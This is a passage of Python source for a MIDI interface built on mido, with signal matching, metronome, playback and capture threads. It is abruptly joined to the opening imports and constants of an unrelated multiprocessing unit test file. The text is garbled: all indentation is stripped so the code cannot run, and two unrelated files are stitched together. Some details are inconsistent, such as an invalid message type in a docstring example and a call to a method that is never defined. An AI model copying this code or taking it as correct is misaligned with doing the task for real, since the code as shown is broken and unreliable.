# A signal that matches a specific mido.Message exactly (ignoring time).
msg = mido.Message(type='control_signal', control=1, value=127)
control_1_127_signal = MidiSignal(msg=msg)
Args:
msg: A mido.Message that should be matched exactly (excluding the time
attribute) or None if wildcards are to be used.
**kwargs: Valid mido.Message arguments. Those that are not provided will be
treated as wildcards.
Raises:
MidiHubError: If the message type is unsupported or the arguments are
not in the valid set for the given or inferred type.
"""
_NOTE_ARGS = set(['type', 'note', 'program_number', 'velocity'])
_CONTROL_ARGS = set(['type', 'control', 'value'])
_VALID_ARGS = {
'note_on': _NOTE_ARGS,
'note_off': _NOTE_ARGS,
'control_change': _CONTROL_ARGS,
}
def __init__(self, msg=None, **kwargs):
if msg is not None and kwargs:
raise MidiHubError(
'Either a mido.Message should be provided or arguments. Not both.')
type_ = msg.type if msg is not None else kwargs.get('type')
if 'type' in kwargs:
del kwargs['type']
if type_ is not None and type_ not in self._VALID_ARGS:
raise MidiHubError(
"The type of a MidiSignal must be either 'note_on', 'note_off', "
"'control_change' or None for wildcard matching. Got '%s'." % type_)
# The compatible mido.Message types.
inferred_types = [type_] if type_ is not None else []
# If msg is not provided, check that the given arguments are valid for some
# message type.
if msg is None:
if type_ is not None:
for arg_name in kwargs:
if arg_name not in self._VALID_ARGS[type_]:
raise MidiHubError(
"Invalid argument for type '%s': %s" % (type_, arg_name))
else:
if kwargs:
for name, args in self._VALID_ARGS.items():
if set(kwargs) <= args:
inferred_types.append(name)
if not inferred_types:
raise MidiHubError(
'Could not infer a message type for set of given arguments: %s'
% ', '.join(kwargs))
# If there is only a single valid inferred type, use it.
if len(inferred_types) == 1:
type_ = inferred_types[0]
self._msg = msg
self._kwargs = kwargs
self._type = type_
self._inferred_types = inferred_types
def to_message(self):
"""Returns a message using the signal's specifications, if possible."""
if self._msg:
return self._msg
if not self._type:
raise MidiHubError('Cannot build message if type is not inferrable.')
return mido.Message(self._type, **self._kwargs)
def __str__(self):
"""Returns a regex pattern for matching against a mido.Message string."""
if self._msg is not None:
regex_pattern = '^' + mido.messages.format_as_string(
self._msg, include_time=False) + r' time=\d+.\d+$'
else:
# Generate regex pattern.
parts = ['.*' if self._type is None else self._type]
for name in mido.messages.SPEC_BY_TYPE[self._inferred_types[0]][
'value_names']:
if name in self._kwargs:
parts.append('%s=%d' % (name, self._kwargs[name]))
else:
parts.append(r'%s=\d+' % name)
regex_pattern = '^' + ' '.join(parts) + r' time=\d+.\d+$'
return regex_pattern
class Metronome(threading.Thread):
"""A thread implementing a MIDI metronome.
Args:
outport: The Mido port for sending messages.
qpm: The integer quarters per minute to signal on.
start_time: The float wall time in seconds to treat as the first beat
for alignment. If in the future, the first tick will not start until
after this time.
stop_time: The float wall time in seconds after which the metronome should
stop, or None if it should continue until `stop` is called.
program: The MIDI program number to use for metronome ticks.
signals: An ordered collection of MidiSignals whose underlying messages are
to be output on the metronome's tick, cyclically. A None value can be
used in place of a MidiSignal to output nothing on a given tick.
duration: The duration of the metronome's tick.
channel: The MIDI channel to output on.
"""
daemon = True
def __init__(self,
outport,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
self._outport = outport
self.update(
qpm, start_time, stop_time, program, signals, duration, channel)
super(Metronome, self).__init__()
def update(self,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
"""Updates Metronome options."""
# Locking is not required since variables are independent and assignment is
# atomic.
self._channel = _DEFAULT_METRONOME_CHANNEL if channel is None else channel
# Set the program number for the channels.
self._outport.send(
mido.Message(
type='program_change', program=program, channel=self._channel))
self._period = 60. / qpm
self._start_time = start_time
self._stop_time = stop_time
if signals is None:
self._messages = _DEFAULT_METRONOME_MESSAGES
else:
self._messages = [s.to_message() if s else None for s in signals]
self._duration = duration
def run(self):
"""Sends message on the qpm interval until stop signal received."""
sleeper = concurrency.Sleeper()
while True:
now = time.time()
tick_number = max(0, int((now - self._start_time) // self._period) + 1)
tick_time = tick_number * self._period + self._start_time
if self._stop_time is not None and self._stop_time < tick_time:
break
sleeper.sleep_until(tick_time)
metric_position = tick_number % len(self._messages)
tick_message = self._messages[metric_position]
if tick_message is None:
continue
tick_message.channel = self._channel
self._outport.send(tick_message)
if tick_message.type == 'note_on':
sleeper.sleep(self._duration)
end_tick_message = mido.Message(
'note_off', note=tick_message.note, channel=self._channel)
self._outport.send(end_tick_message)
def stop(self, stop_time=0, block=True):
"""Signals for the metronome to stop.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until thread terminates.
"""
self._stop_time = stop_time
if block:
self.join()
class MidiPlayer(threading.Thread):
"""A thread for playing back a NoteSequence proto via MIDI.
The NoteSequence times must be based on the wall time. The playhead matches
the wall clock. The playback sequence may be updated at any time if
`allow_updates` is set to True.
Args:
outport: The Mido port for sending messages.
sequence: The NoteSequence to play.
start_time: The float time before which to strip events. Defaults to
construction time. Events before this time will be sent immediately on
start.
allow_updates: If False, the thread will terminate after playback of
`sequence` completes and calling `update_sequence` will result in an
exception. Otherwise, the the thread will stay alive until `stop` is
called, allowing for additional updates via `update_sequence`.
channel: The MIDI channel to send playback events.
offset: The float time in seconds to adjust the playback event times by.
"""
def __init__(self, outport, sequence, start_time=time.time(),
allow_updates=False, channel=0, offset=0.0):
self._outport = outport
self._channel = channel
self._offset = offset
# Set of notes (pitches) that are currently on.
self._open_notes = set()
# Lock for serialization.
self._lock = threading.RLock()
# A control variable to signal when the sequence has been updated.
self._update_cv = threading.Condition(self._lock)
# The queue of mido.Message objects to send, sorted by ascending time.
self._message_queue = collections.deque()
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Initialize message queue.
# We first have to allow "updates" to set the initial sequence.
self._allow_updates = True
self.update_sequence(sequence, start_time=start_time)
# We now make whether we allow updates dependent on the argument.
self._allow_updates = allow_updates
super(MidiPlayer, self).__init__()
@concurrency.serialized
def update_sequence(self, sequence, start_time=None):
"""Updates sequence being played by the MidiPlayer.
Adds events to close any notes that are no longer being closed by the
new sequence using the times when they would have been closed by the
previous sequence.
Args:
sequence: The NoteSequence to play back.
start_time: The float time before which to strip events. Defaults to call
time.
Raises:
MidiHubError: If called when _allow_updates is False.
"""
if start_time is None:
start_time = time.time()
if not self._allow_updates:
raise MidiHubError(
'Attempted to update a MidiPlayer sequence with updates disabled.')
new_message_list = []
# The set of pitches that are already playing and will be closed without
# first being reopened in in the new sequence.
closed_notes = set()
for note in sequence.notes:
if note.start_time >= start_time:
new_message_list.append(
mido.Message(type='note_on', note=note.pitch,
velocity=note.velocity, time=note.start_time))
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
elif note.end_time >= start_time and note.pitch in self._open_notes:
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
closed_notes.add(note.pitch)
# Close remaining open notes at the next event time to avoid abruptly ending
# notes.
notes_to_close = self._open_notes - closed_notes
if notes_to_close:
next_event_time = (
min(msg.time for msg in new_message_list) if new_message_list else 0)
for note in notes_to_close:
new_message_list.append(
mido.Message(type='note_off', note=note, time=next_event_time))
for msg in new_message_list:
msg.channel = self._channel
msg.time += self._offset
self._message_queue = collections.deque(
sorted(new_message_list, key=lambda msg: (msg.time, msg.note)))
self._update_cv.notify()
@concurrency.serialized
def run(self):
"""Plays messages in the queue until empty and _allow_updates is False."""
# Assumes model where NoteSequence is time-stamped with wall time.
# TODO(hanzorama): Argument to allow initial start not at sequence start?
while self._message_queue and self._message_queue[0].time < time.time():
self._message_queue.popleft()
while True:
while self._message_queue:
delta = self._message_queue[0].time - time.time()
if delta > 0:
self._update_cv.wait(timeout=delta)
else:
msg = self._message_queue.popleft()
if msg.type == 'note_on':
self._open_notes.add(msg.note)
elif msg.type == 'note_off':
self._open_notes.discard(msg.note)
self._outport.send(msg)
# Either keep player alive and wait for sequence update, or return.
if self._allow_updates:
self._update_cv.wait()
else:
break
def stop(self, block=True):
"""Signals for the playback to stop and ends all open notes.
Args:
block: If true, blocks until thread terminates.
"""
with self._lock:
if not self._stop_signal.is_set():
self._stop_signal.set()
self._allow_updates = False
# Replace message queue with immediate end of open notes.
self._message_queue.clear()
for note in self._open_notes:
self._message_queue.append(
mido.Message(type='note_off', note=note, time=time.time()))
self._update_cv.notify()
if block:
self.join()
class MidiCaptor(threading.Thread):
"""Base class for thread that captures MIDI into a NoteSequence proto.
If neither `stop_time` nor `stop_signal` are provided as arguments, the
capture will continue until the `stop` method is called.
Args:
qpm: The quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds when the capture begins. Events
occuring before this time are ignored.
stop_time: The float wall time in seconds when the capture is to be stopped
or None.
stop_signal: A MidiSignal to use as a signal to stop capture.
"""
_metaclass__ = abc.ABCMeta
# A message that is used to wake the consumer thread.
_WAKE_MESSAGE = None
def __init__(self, qpm, start_time=0, stop_time=None, stop_signal=None):
# A lock for synchronization.
self._lock = threading.RLock()
self._receive_queue = Queue.Queue()
self._captured_sequence = music_pb2.NoteSequence()
self._captured_sequence.tempos.add(qpm=qpm)
self._start_time = start_time
self._stop_time = stop_time
self._stop_regex = re.compile(str(stop_signal))
# A set of active MidiSignals being used by iterators.
self._iter_signals = []
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Active callback threads keyed by unique thread name.
self._callbacks = {}
super(MidiCaptor, self).__init__()
@property
@concurrency.serialized
def start_time(self):
return self._start_time
@start_time.setter
@concurrency.serialized
def start_time(self, value):
"""Updates the start time, removing any notes that started before it."""
self._start_time = value
i = 0
for note in self._captured_sequence.notes:
if note.start_time >= self._start_time:
break
i += 1
del self._captured_sequence.notes[:i]
@property
@concurrency.serialized
def _stop_time(self):
return self._stop_time_unsafe
@_stop_time.setter
@concurrency.serialized
def _stop_time(self, value):
self._stop_time_unsafe = value
def receive(self, msg):
"""Adds received mido.Message to the queue for capture.
Args:
msg: The incoming mido.Message object to add to the queue for capture. The
time attribute is assumed to be pre-set with the wall time when the
message was received.
Raises:
MidiHubError: When the received message has an empty time attribute.
"""
if not msg.time:
raise MidiHubError(
'MidiCaptor received message with empty time attribute: %s' % msg)
self._receive_queue.put(msg)
@abc.abstractmethod
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Must be serialized in children.
Args:
msg: The incoming mido.Message object to capture. The time field is
assumed to be pre-filled with the wall time when the message was
received.
"""
pass
def _add_note(self, msg):
"""Adds and returns a new open note based on the MIDI message."""
new_note = self._captured_sequence.notes.add()
new_note.start_time = msg.time
new_note.pitch = msg.note
new_note.velocity = msg.velocity
new_note.is_drum = (msg.channel == _DRUM_CHANNEL)
return new_note
def run(self):
"""Captures incoming messages until stop time or signal received."""
while True:
timeout = None
stop_time = self._stop_time
if stop_time is not None:
timeout = stop_time - time.time()
if timeout <= 0:
break
try:
msg = self._receive_queue.get(block=True, timeout=timeout)
except Queue.Empty:
continue
if msg is MidiCaptor._WAKE_MESSAGE:
continue
if msg.time <= self._start_time:
continue
if self._stop_regex.match(str(msg)) is not None:
break
with self._lock:
msg_str = str(msg)
for regex, queue in self._iter_signals:
if regex.match(msg_str) is not None:
queue.put(msg.copy())
self._capture_message(msg)
stop_time = self._stop_time
end_time = stop_time if stop_time is not None else msg.time
# Acquire lock to avoid race condition with `iterate`.
with self._lock:
# Set final captured sequence.
self._captured_sequence = self.captured_sequence(end_time)
# Wake up all generators.
for regex, queue in self._iter_signals:
queue.put(MidiCaptor._WAKE_MESSAGE)
def stop(self, stop_time=None, block=True):
"""Ends capture and truncates the captured sequence at `stop_time`.
Args:
stop_time: The float time in seconds to stop the capture, or None if it
should be stopped now. May be in the past, in which case the captured
sequence will be truncated appropriately.
block: If True, blocks until the thread terminates.
Raises:
MidiHubError: When called multiple times with a `stop_time`.
"""
with self._lock:
if self._stop_signal.is_set():
if stop_time is not None:
raise MidiHubError(
'`stop` must not be called multiple times with a `stop_time` on '
'MidiCaptor.')
else:
self._stop_signal.set()
self._stop_time = time.time() if stop_time is None else stop_time
# Force the thread to wake since we've updated the stop time.
self._receive_queue.put(MidiCaptor._WAKE_MESSAGE)
if block:
self.join()
def captured_sequence(self, end_time=None):
"""Returns a copy of the current captured sequence.
If called before the thread terminates, `end_time` is required and any open
notes will have their end time set to it, any notes starting after it will
be removed, and any notes ending after it will be truncated. `total_time`
will also be set to `end_time`.
Args:
end_time: The float time in seconds to close any open notes and after
which to close or truncate notes, if the thread is still alive.
Otherwise, must be None.
Returns:
A copy of the current captured NoteSequence proto with open notes closed
at and later notes removed or truncated to `end_time`.
Raises:
MidiHubError: When the thread is alive and `end_time` is None or the
thread is terminated and `end_time` is not None.
"""
# Make a copy of the sequence currently being captured.
current_captured_sequence = music_pb2.NoteSequence()
with self._lock:
current_captured_sequence.CopyFrom(self._captured_sequence)
if self.is_alive():
if end_time is None:
raise MidiHubError(
'`end_time` must be provided when capture thread is still running.')
for i, note in enumerate(current_captured_sequence.notes):
if note.start_time >= end_time:
del current_captured_sequence.notes[i:]
break
if not note.end_time or note.end_time > end_time:
note.end_time = end_time
current_captured_sequence.total_time = end_time
elif end_time is not None:
raise MidiHubError(
'`end_time` must not be provided when capture is complete.')
return current_captured_sequence
def iterate(self, signal=None, period=None):
"""Yields the captured sequence at every signal message or time period.
Exactly one of `signal` or `period` must be specified. Continues until the
captor terminates, at which point the final captured sequence is yielded
before returning.
If consecutive calls to iterate are longer than the period, immediately
yields and logs a warning.
Args:
signal: A MidiSignal to use as a signal to yield, or None.
period: A float period in seconds, or None.
Yields:
The captured NoteSequence at event time.
Raises:
MidiHubError: If neither `signal` nor `period` or both are specified.
"""
if (signal, period).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `period` must be provided to `iterate` '
'call.')
if signal is None:
sleeper = concurrency.Sleeper()
next_yield_time = time.time() + period
else:
regex = re.compile(str(signal))
queue = Queue.Queue()
with self._lock:
self._iter_signals.append((regex, queue))
while self.is_alive():
if signal is None:
skipped_periods = (time.time() - next_yield_time) // period
if skipped_periods > 0:
tf.logging.warn(
'Skipping %d %.3fs period(s) to catch up on iteration.',
skipped_periods, period)
next_yield_time += skipped_periods * period
else:
sleeper.sleep_until(next_yield_time)
end_time = next_yield_time
next_yield_time += period
else:
signal_msg = queue.get()
if signal_msg is MidiCaptor._WAKE_MESSAGE:
# This is only recieved when the thread is in the process of
# terminating. Wait until it is done before yielding the final
# sequence.
self.join()
break
end_time = signal_msg.time
# Acquire lock so that `captured_sequence` will be called before thread
# terminates, if it has not already done so.
with self._lock:
if not self.is_alive():
break
captured_sequence = self.captured_sequence(end_time)
yield captured_sequence
yield self.captured_sequence()
def register_callback(self, fn, signal=None, period=None):
"""Calls `fn` at every signal message or time period.
The callback function must take exactly one argument, which will be the
current captured NoteSequence.
Exactly one of `signal` or `period` must be specified. Continues until the
captor thread terminates, at which point the callback is called with the
final sequence, or `cancel_callback` is called.
If callback execution is longer than a period, immediately calls upon
completion and logs a warning.
Args:
fn: The callback function to call, passing in the captured sequence.
signal: A MidiSignal to use as a signal to call `fn` on the current
captured sequence, or None.
period: A float period in seconds to specify how often to call `fn`, or
None.
Returns:
The unqiue name of the callback thread to enable cancellation.
Raises:
MidiHubError: If neither `signal` nor `period` or both are specified.
"""
class IteratorCallback(threading.Thread):
"""A thread for executing a callback on each iteration."""
def __init__(self, iterator, fn):
self._iterator = iterator
self._fn = fn
self._stop_signal = threading.Event()
super(IteratorCallback, self).__init__()
def run(self):
"""Calls the callback function for each iterator value."""
for captured_sequence in self._iterator:
if self._stop_signal.is_set():
break
self._fn(captured_sequence)
def stop(self):
"""Stops the thread on next iteration, without blocking."""
self._stop_signal.set()
t = IteratorCallback(self.iterate(signal, period), fn)
t.start()
with self._lock:
assert t.name not in self._callbacks
self._callbacks[t.name] = t
return t.name
@concurrency.serialized
def cancel_callback(self, name):
"""Cancels the callback with the given name.
While the thread may continue to run until the next iteration, the callback
function will not be executed.
Args:
name: The unique name of the callback thread to cancel.
"""
self._callbacks[name].stop()
del self._callbacks[name]
class MonophonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for monophonic melodies."""
def __init__(self, *args, **kwargs):
self._open_note = None
super(MonophonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
If the message is a note_on event, ends the previous note (if applicable)
and opens a new note in the capture sequence. Ignores repeated note_on
events.
If the message is a note_off event matching the current open note in the
capture sequence
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if self._open_note is None or msg.note != self._open_note.pitch:
# This is not the note we're looking for. Drop it.
return
self._open_note.end_time = msg.time
self._open_note = None
elif msg.type == 'note_on':
if self._open_note:
if self._open_note.pitch == msg.note:
# This is just a repeat of the previous message.
return
# End the previous note.
self._open_note.end_time = msg.time
self._open_note = self._add_note(msg)
class PolyphonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for polyphonic melodies."""
def __init__(self, *args, **kwargs):
# A dictionary of open NoteSequence.Note messages keyed by pitch.
self._open_notes = dict()
super(PolyphonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if msg.note not in self._open_notes:
# This is not a note we're looking for. Drop it.
return
self._open_notes[msg.note].end_time = msg.time
del self._open_notes[msg.note]
elif msg.type == 'note_on':
if msg.note in self._open_notes:
# This is likely just a repeat of the previous message.
return
new_note = self._add_note(msg)
self._open_notes[new_note.pitch] = new_note
class TextureType(object):
"""An Enum specifying the type of musical texture."""
MONOPHONIC = 1
POLYPHONIC = 2
class MidiHub(object):
"""A MIDI interface for capturing and playing NoteSequences.
Ignores/filters `program_change` messages. Assumes all messages are on the
same channel.
Args:
input_midi_port: The string MIDI port name or mido.ports.BaseInput object to
use for input. If a name is given that is not an available port, a
virtual port will be opened with that name.
output_midi_port: The string MIDI port name mido.ports.BaseOutput object to
use for output. If a name is given that is not an available port, a
virtual port will be opened with that name.
texture_type: A TextureType Enum specifying the musical texture to assume
during capture, passthrough, and playback.
passthrough: A boolean specifying whether or not to pass incoming messages
through to the output, applying the appropriate texture rules.
playback_channel: The MIDI channel to send playback events.
playback_offset: The float time in seconds to adjust the playback event
times by.
"""
def __init__(self, input_midi_ports, output_midi_ports, texture_type,
passthrough=True, playback_channel=0, playback_offset=0.0):
self._texture_type = texture_type
self._passthrough = passthrough
self._playback_channel = playback_channel
self._playback_offset = playback_offset
# When `passthrough` is True, this is the set of open MIDI note pitches.
self._open_notes = set()
# This lock is used by the serialized decorator.
self._lock = threading.RLock()
# A dictionary mapping a compiled MidiSignal regex to a condition variable
# that will be notified when a matching messsage is received.
self._signals = {}
# A dictionary mapping a compiled MidiSignal regex to a list of functions
# that will be called with the triggering message in individual threads when
# a matching message is received.
self._callbacks = collections.defaultdict(list)
# A dictionary mapping integer control numbers to most recently-received
# integer value.
self._control_values = {}
# Threads actively being used to capture incoming messages.
self._captors = []
# Potentially active player threads.
self._players = []
self._metronome = None
# Open MIDI ports.
if input_midi_ports:
for port in input_midi_ports:
if isinstance(port, mido.ports.BaseInput):
inport = port
else:
virtual = port not in get_available_input_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for input.", port)
inport = mido.open_input(port, virtual=virtual)
# Start processing incoming messages.
inport.callback = self._timestamp_and_handle_message
else:
tf.logging.warn('No input port specified. Capture disabled.')
self._inport = None
outports = []
for port in output_midi_ports:
if isinstance(port, mido.ports.BaseInput):
outports.append(port)
else:
virtual = port not in get_available_output_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for output.", port)
outports.append(mido.open_output(port, virtual=virtual))
self._outport = mido.ports.MultiPort(outports)
def __del__(self):
"""Stops all running threads and waits for them to terminate."""
for captor in self._captors:
captor.stop(block=False)
for player in self._players:
player.stop(block=False)
self.stop_metronome()
for captor in self._captors:
captor.join()
for player in self._players:
player.join()
@property
@concurrency.serialized
def passthrough(self):
return self._passthrough
@passthrough.setter
@concurrency.serialized
def passthrough(self, value):
"""Sets passthrough value, closing all open notes if being disabled."""
if self._passthrough == value:
return
# Close all open notes.
while self._open_notes:
self._outport.send(mido.Message('note_off', note=self._open_notes.pop()))
self._passthrough = value
def _timestamp_and_handle_message(self, msg):
"""Stamps message with current time and passes it to the handler."""
if msg.type == 'program_change':
return
if not msg.time:
msg.time = time.time()
self._handle_message(msg)
@concurrency.serialized
def _handle_message(self, msg):
"""Handles a single incoming MIDI message.
-If the message is being used as a signal, notifies threads waiting on the
appropriate condition variable.
-Adds the message to any capture queues.
-Passes the message through to the output port, if appropriate.
Args:
msg: The mido.Message MIDI message to handle.
"""
# Notify any threads waiting for this message.
msg_str = str(msg)
for regex in list(self._signals):
if regex.match(msg_str) is not None:
self._signals[regex].notify_all()
del self._signals[regex]
# Call any callbacks waiting for this message.
for regex in list(self._callbacks):
if regex.match(msg_str) is not None:
for fn in self._callbacks[regex]:
threading.Thread(target=fn, args=(msg,)).start()
del self._callbacks[regex]
# Remove any captors that are no longer alive.
self._captors[:] = [t for t in self._captors if t.is_alive()]
# Add a different copy of the message to the receive queue of each live
# capture thread.
for t in self._captors:
t.receive(msg.copy())
# Update control values if this is a control change message.
if msg.type == 'control_change':
if self._control_values.get(msg.control, None) != msg.value:
tf.logging.debug('Control change %d: %d', msg.control, msg.value)
self._control_values[msg.control] = msg.value
# Pass the message through to the output port, if appropriate.
if not self._passthrough:
pass
elif self._texture_type == TextureType.POLYPHONIC:
if msg.type == 'note_on' and msg.velocity > 0:
self._open_notes.add(msg.note)
elif (msg.type == 'note_off' or
(msg.type == 'note_on' and msg.velocity == 0)):
self._open_notes.discard(msg.note)
self._outport.send(msg)
elif self._texture_type == TextureType.MONOPHONIC:
assert len(self._open_notes) <= 1
if msg.type not in ['note_on', 'note_off']:
self._outport.send(msg)
elif ((msg.type == 'note_off' or
msg.type == 'note_on' and msg.velocity == 0) and
msg.note in self._open_notes):
self._outport.send(msg)
self._open_notes.remove(msg.note)
elif msg.type == 'note_on' and msg.velocity > 0:
if self._open_notes:
self._outport.send(
mido.Message('note_off', note=self._open_notes.pop()))
self._outport.send(msg)
self._open_notes.add(msg.note)
def start_capture(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Starts a MidiCaptor to compile incoming messages into a NoteSequence.
If neither `stop_time` nor `stop_signal`, are provided, the caller must
explicitly stop the returned capture thread. If both are specified, the one
that occurs first will stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The MidiCaptor thread.
"""
if self._texture_type == TextureType.MONOPHONIC:
captor_class = MonophonicMidiCaptor
else:
captor_class = PolyphonicMidiCaptor
captor = captor_class(qpm, start_time, stop_time, stop_signal)
with self._lock:
self._captors.append(captor)
captor.start()
return captor
def capture_sequence(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Compiles and returns incoming messages into a NoteSequence.
Blocks until capture stops. At least one of `stop_time` or `stop_signal`
must be specified. If both are specified, the one that occurs first will
stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The captured NoteSequence proto.
Raises:
MidiHubError: When neither `stop_time` nor `stop_signal` are provided.
"""
if stop_time is None and stop_signal is None:
raise MidiHubError(
'At least one of `stop_time` and `stop_signal` must be provided to '
'`capture_sequence` call.')
captor = self.start_capture(qpm, start_time, stop_time, stop_signal)
captor.join()
return captor.captured_sequence()
@concurrency.serialized
def wait_for_event(self, signal=None, timeout=None):
"""Blocks until a matching mido.Message arrives or the timeout occurs.
Exactly one of `signal` or `timeout` must be specified. Using a timeout
with a threading.Condition object causes additional delays when notified.
Args:
signal: A MidiSignal to use as a signal to stop waiting, or None.
timeout: A float timeout in seconds, or None.
Raises:
MidiHubError: If neither `signal` nor `timeout` or both are specified.
"""
if (signal, timeout).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `timeout` must be provided to '
'`wait_for_event` call.')
if signal is None:
concurrency.Sleeper().sleep(timeout)
return
signal_pattern = str(signal)
cond_var = None
for regex, cond_var in self._signals:
if regex.pattern == signal_pattern:
break
if cond_var is None:
cond_var = threading.Condition(self._lock)
self._signals[re.compile(signal_pattern)] = cond_var
cond_var.wait()
@concurrency.serialized
def wake_signal_waiters(self, signal=None):
"""Wakes all threads waiting on a signal event.
Args:
signal: The MidiSignal to wake threads waiting on, or None to wake all.
"""
for regex in list(self._signals):
if signal is None or regex.pattern == str(signal):
self._signals[regex].notify_all()
del self._signals[regex]
for captor in self._captors:
captor.wake_signal_waiters(signal)
@concurrency.serialized
def start_metronome(self, qpm, start_time, signals=None, channel=None):
"""Starts or updates the metronome with the given arguments.
Args:
qpm: The quarter notes per minute to use.
start_time: The wall time in seconds that the metronome is started on for
synchronization and beat alignment. May be in the past.
signals: An ordered collection of MidiSignals whose underlying messages
are to be output on the metronome's tick, cyclically. A None value can
be used in place of a MidiSignal to output nothing on a given tick.
channel: The MIDI channel to output ticks on.
"""
if self._metronome is not None and self._metronome.is_alive():
self._metronome.update(
qpm, start_time, signals=signals, channel=channel)
else:
self._metronome = Metronome(
self._outport, qpm, start_time, signals=signals, channel=channel)
self._metronome.start()
@concurrency.serialized
def stop_metronome(self, stop_time=0, block=True):
"""Stops the metronome at the given time if it is currently running.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until metronome is stopped.
"""
if self._metronome is None:
return
self._metronome.stop(stop_time, block)
self._metronome = None
def start_playback(self, sequence, start_time=time.time(),
allow_updates=False):
"""Plays the notes in aNoteSequence via the MIDI output port.
Args:
sequence: The NoteSequence to play, with times based on the wall clock.
start_time: The float time before which to strip events. Defaults to call
time. Events before this time will be sent immediately on start.
allow_updates: A boolean specifying whether or not the player should stay
allow the sequence to be updated and stay alive until `stop` is
called.
Returns:
The MidiPlayer thread handling playback to enable updating.
"""
player = MidiPlayer(self._outport, sequence, start_time, allow_updates,
self._playback_channel, self._playback_offset)
with self._lock:
self._players.append(player)
player.start()
return player
@concurrency.serialized
def control_value(self, control_number):
"""Returns the most recently received value for the given control number.
Args:
control_number: The integer control number to return the value for, or
None.
Returns:
The most recently recieved integer value for the given control number, or
None if no values have been received for that control.
"""
if control_number is None:
return None
return self._control_values.get(control_number)
def send_control_change(self, control_number, value):
"""Sends the specified control change message on the output port."""
self._outport.send(
mido.Message(
type='control_change',
control=control_number,
value=value))
@concurrency.serialized
def register_callback(self, fn, signal):
"""Calls `fn` at the next signal message.
The callback function must take exactly one argument, which will be the
message triggering the signal.
Survives until signal is called or the MidiHub is destroyed.
Args:
fn: The callback function to call, passing in the triggering message.
signal: A MidiSignal to use as a signal to call `fn` on the triggering
message.
"""
self._callbacks[re.compile(str(signal))].append(fn)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
